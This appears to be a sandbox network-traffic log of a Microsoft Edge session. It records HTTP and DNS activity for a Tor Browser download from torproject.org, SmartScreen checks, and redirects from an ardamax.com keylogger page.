User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/thank-you/index.html
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 04 Nov 2024 17:03:11 GMT
ETag: "5e4c-626194275a633-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:35 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5272
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-browse.png?h=86d8fd2b HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-browse.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "c7c5-6247120c00846"
Accept-Ranges: bytes
Content-Length: 51141
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:35 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/dist/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /dist/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 302 Found

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/dist/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Location: https://dist.torproject.org/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:35 GMT
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-speak.png?h=abdc7268 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-speak.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "bba6-6247120c017e6"
Accept-Ranges: bytes
Content-Length: 48038
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:35 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-us-2.uksouth.cloudapp.azure.com

prod-agic-us-2.uksouth.cloudapp.azure.com

IN A

172.165.69.228
DNS

dist.torproject.org

msedge.exe

Remote address:

8.8.8.8:53

Request

dist.torproject.org

IN A

Response

dist.torproject.org

IN A

204.8.99.144

dist.torproject.org

IN A

116.202.120.165

dist.torproject.org

IN A

116.202.120.166

dist.torproject.org

IN A

204.8.99.146
DNS

228.69.165.172.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

228.69.165.172.in-addr.arpa

IN PTR

Response
DNS

cacerts.digicert.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cacerts.digicert.com

IN A

Response

cacerts.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
DNS

cacerts.digicert.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cacerts.digicert.com

IN A

Response

cacerts.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

172.165.69.228:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiQVBvRFRBaVZ3REE9Iiwia2V5IjoicDBXZVdzNkF2VHJ5WHZSWUxQeWp2Zz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1829
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 889
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

msedge.exe

Remote address:

172.165.69.228:443

Request

POST /api/browser/edge/download/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiUHZNWEtydmlxVEE9Iiwia2V5IjoiWS9leW0wUDFjSnVSVWhXV3JmQjQwUT09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1773
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 971
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
GET

https://dist.torproject.org/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe HTTP/1.1
Host: dist.torproject.org
Connection: keep-alive
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Content-Security-Policy: default-src 'self';
Onion-Location: http://scpalcwstkydpa3y7dbpkjs2dtr7zvtvdbyj3dqwkucfrwyixcl5ptqd.onion/torbrowser/14.0.3/tor-browser-windows-x86_64-portable-14.0.3.exe
Last-Modified: Tue, 26 Nov 2024 03:10:47 GMT
ETag: "691a4f8-627c8321d6ce7"
Accept-Ranges: bytes
Content-Length: 110208248
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

https://www.torproject.org/static/images/circle-pattern.png?h=9a4040e4

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/circle-pattern.png?h=9a4040e4 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/circle-pattern.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Thu, 19 Oct 2023 14:46:01 GMT
ETag: "bb09-60812d0853a53"
Accept-Ranges: bytes
Content-Length: 47881
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/arrow-down.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/primary/solid/arrow-down.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:36 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/primary/solid/arrow-down.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:03 GMT
ETag: "c82-5d788645e9ec0"
Accept-Ranges: bytes
Content-Length: 3202
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:36 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/SourceSerifPro/SourceSerifPro-Regular.ttf

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/SourceSerifPro/SourceSerifPro-Regular.ttf HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/SourceSerifPro/SourceSerifPro-Regular.ttf
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Mar 2022 14:36:00 GMT
ETag: "1bbe8-5d9b5e6528f77-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:35 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 51008
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/font-sfnt
Content-Language: en
GET

https://www.torproject.org/static/images/circle-pattern.svg?h=9a4040e4

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/circle-pattern.svg?h=9a4040e4 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:36 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/circle-pattern.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Thu, 19 Oct 2023 14:46:01 GMT
ETag: "2be7-60812d0853a53-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:36 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1717
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/paper-plane.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/primary/solid/paper-plane.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/primary/solid/paper-plane.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:03 GMT
ETag: "1875-5d788645e9ec0"
Accept-Ranges: bytes
Content-Length: 6261
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/cube.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/primary/solid/cube.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:36 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/primary/solid/cube.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:02 GMT
ETag: "f3c-5d788644f5c80"
Accept-Ranges: bytes
Content-Length: 3900
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:36 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/hands-helping.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/primary/solid/hands-helping.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:36 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/primary/solid/hands-helping.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:01 GMT
ETag: "1287-5d78864401a40"
Accept-Ranges: bytes
Content-Length: 4743
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:36 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
DNS

161.176.19.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

161.176.19.84.in-addr.arpa

IN PTR

Response

161.176.19.84.in-addr.arpa

IN PTR

s1114109 keymachinede
DNS

161.176.19.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

161.176.19.84.in-addr.arpa

IN PTR

Response

161.176.19.84.in-addr.arpa

IN PTR

s1114109 keymachinede
DNS

116.255.154.38.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.255.154.38.in-addr.arpa

IN PTR

Response
DNS

116.255.154.38.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.255.154.38.in-addr.arpa

IN PTR

Response
DNS

239.208.241.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

239.208.241.185.in-addr.arpa

IN PTR

Response
DNS

239.208.241.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

239.208.241.185.in-addr.arpa

IN PTR

Response
DNS

aefd.nelreports.net

msedge.exe

Remote address:

8.8.8.8:53

Request

aefd.nelreports.net

IN A

Response

aefd.nelreports.net

IN CNAME

aefd.nelreports.net.akamaized.net

aefd.nelreports.net.akamaized.net

IN CNAME

a1851.dscg2.akamai.net

a1851.dscg2.akamai.net

IN A

23.73.137.233

a1851.dscg2.akamai.net

IN A

23.73.138.209
DNS

aefd.nelreports.net

msedge.exe

Remote address:

8.8.8.8:53

Request

aefd.nelreports.net

IN A

Response

aefd.nelreports.net

IN CNAME

aefd.nelreports.net.akamaized.net

aefd.nelreports.net.akamaized.net

IN CNAME

a1851.dscg2.akamai.net

a1851.dscg2.akamai.net

IN A

23.73.138.209

a1851.dscg2.akamai.net

IN A

23.73.137.233
DNS

aefd.nelreports.net

msedge.exe

Remote address:

8.8.8.8:53

Request

aefd.nelreports.net

IN A

Response

aefd.nelreports.net

IN CNAME

aefd.nelreports.net.akamaized.net

aefd.nelreports.net.akamaized.net

IN CNAME

a1851.dscg2.akamai.net

a1851.dscg2.akamai.net

IN A

23.73.138.209

a1851.dscg2.akamai.net

IN A

23.73.137.233
DNS

aefd.nelreports.net

msedge.exe

Remote address:

8.8.8.8:53

Request

aefd.nelreports.net

IN A

Response

aefd.nelreports.net

IN CNAME

aefd.nelreports.net.akamaized.net

aefd.nelreports.net.akamaized.net

IN CNAME

a1851.dscg2.akamai.net

a1851.dscg2.akamai.net

IN A

23.73.137.233

a1851.dscg2.akamai.net

IN A

23.73.138.209
DNS

209.138.73.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.138.73.23.in-addr.arpa

IN PTR

Response

209.138.73.23.in-addr.arpa

IN PTR

a23-73-138-209deploystaticakamaitechnologiescom

172.234.222.138:80

www.ardamax.com

msedge.exe

190 B
84 B
4
2
172.234.222.138:80

http://www.ardamax.com/keylogger/

http

msedge.exe

733 B
636 B
6
4

HTTP Request

GET http://www.ardamax.com/keylogger/

HTTP Response

302
72.52.179.174:80

http://ww99.ardamax.com/keylogger/

http

msedge.exe

734 B
448 B
6
4

HTTP Request

GET http://ww99.ardamax.com/keylogger/

HTTP Response

302
72.52.179.174:80

ww99.ardamax.com

msedge.exe

190 B
84 B
4
2
51.140.244.186:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

6.3kB
11.5kB
18
15

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
51.140.244.186:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

3.1kB
8.1kB
13
11

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
51.140.244.186:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

5.8kB
10.6kB
17
15

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
199.59.243.227:80

http://ww7.ardamax.com/_fd?usid=19&utid=19445573727

http

msedge.exe

2.7kB
46.7kB
27
41

HTTP Request

GET http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727

HTTP Response

200

HTTP Request

GET http://ww7.ardamax.com/bXaYyztWU.js

HTTP Response

200

HTTP Request

POST http://ww7.ardamax.com/_fd?usid=19&utid=19445573727

HTTP Response

200
51.140.244.186:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

3.1kB
8.1kB
12
11

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
172.217.16.228:443

